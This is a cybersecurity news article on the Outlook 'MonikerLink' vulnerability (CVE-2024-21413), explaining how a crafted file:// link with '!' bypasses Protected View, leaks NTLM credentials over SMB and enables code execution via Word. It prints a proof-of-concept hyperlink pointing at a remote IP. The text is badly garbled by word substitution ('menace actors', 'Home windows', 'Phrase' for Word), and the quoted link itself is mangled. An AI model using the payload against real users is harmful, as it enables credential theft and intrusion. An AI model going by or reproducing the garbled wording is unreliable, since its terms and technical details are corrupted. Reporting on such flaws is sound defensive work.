Outlook has been found to have an attention-grabbing vulnerability whereas dealing with particular hyperlinks, which was discovered to be exploited by menace actors within the wild. This vulnerability has been assigned with CVE-2024-21413, and the severity was given as 9.8 (Crucial).
Nonetheless, Microsoft has addressed this vulnerability and glued it as a part of their Patch Tuesday launch of February 2024. Profitable exploitation of this vulnerability might enable a menace actor to bypass the Workplace-protected view and open a file in modifying mode as an alternative of the āprotected mode.ā
Reside assault simulation Webinar demonstrates varied methods wherein account takeover can occur and practices to guard your web sites and APIs towards ATO assaults.
Outlook 0-day RCE Flaw
Based on the Checkpoint report, if the hyperlink begins with http:// or https://, Outlook makes use of Home windowsās default browser to open the URL. Nonetheless, if there are every other protocols just like the āSkypeā URL protocol, clicking on the hyperlink will show a safety warning.
In different circumstances, just like the āfile://ā protocol, Outlook didn’t show a warning dialog field. As a substitute, it had an error message within the Home windows Notification Heart, and the useful resource that was tried to entry via the hyperlink was additionally not accessed.
If the file was accessed, there’s a excessive probability that the native NTLM credential info might have been leaked.
The #MonikerLink Bug
A slight modification within the āfile://ā protocol hyperlink bypasses the beforehand proven safety restriction and proceeds to entry the useful resource. For testing functions, the under hyperlink was used, which efficiently accessed the ācheck.rtfā file on the distant useful resource.
<a href=āfile:///10.10.111.111testtest.rtf!one thingā>CLICK ME</a> |
As acknowledged by researchers, accessing this useful resource makes use of the SMB protocol that leaks the native NTLM credential info in the course of the course of. Furthermore, researchers additionally tried escalating this assault vector to arbitrary code execution.Ā
Moniker Hyperlink string makes use of the āsearch forā for COM (Element Object Mannequin) objects on Home windows. Outlook calls the ole32!MkParseDisplayName() API for doing this job. As per Microsoftās API doc for Moniker, together with ā!ā makes it a composite moniker.
Exploitation
Researchers used this composite moniker with FileMoniker (10.10.111.111testtest.rtf) + ItemMoniker (one thing) for accessing Microsoft Phrase. Home windows runs Microsoft Phrase as a COM server within the background.
If the hyperlink is clicked, Phrase opens and parses the file ācheck.rtfā based mostly on the string ā10.10.111.111testtest.rtfā. Nonetheless, this check.rtf is managed by the attacker, which was additional modified to carry out arbitrary code execution on the distant system utilizing āWINWORD.EXEā.
Researchers acknowledged this #MonikerLink bug/assault vector could also be current in different software program and in addition suggest builders examine and repair the difficulty.
Keep up to date on Cybersecurity information, Whitepapers, and Infographics. Comply with us on LinkedIn & Twitter.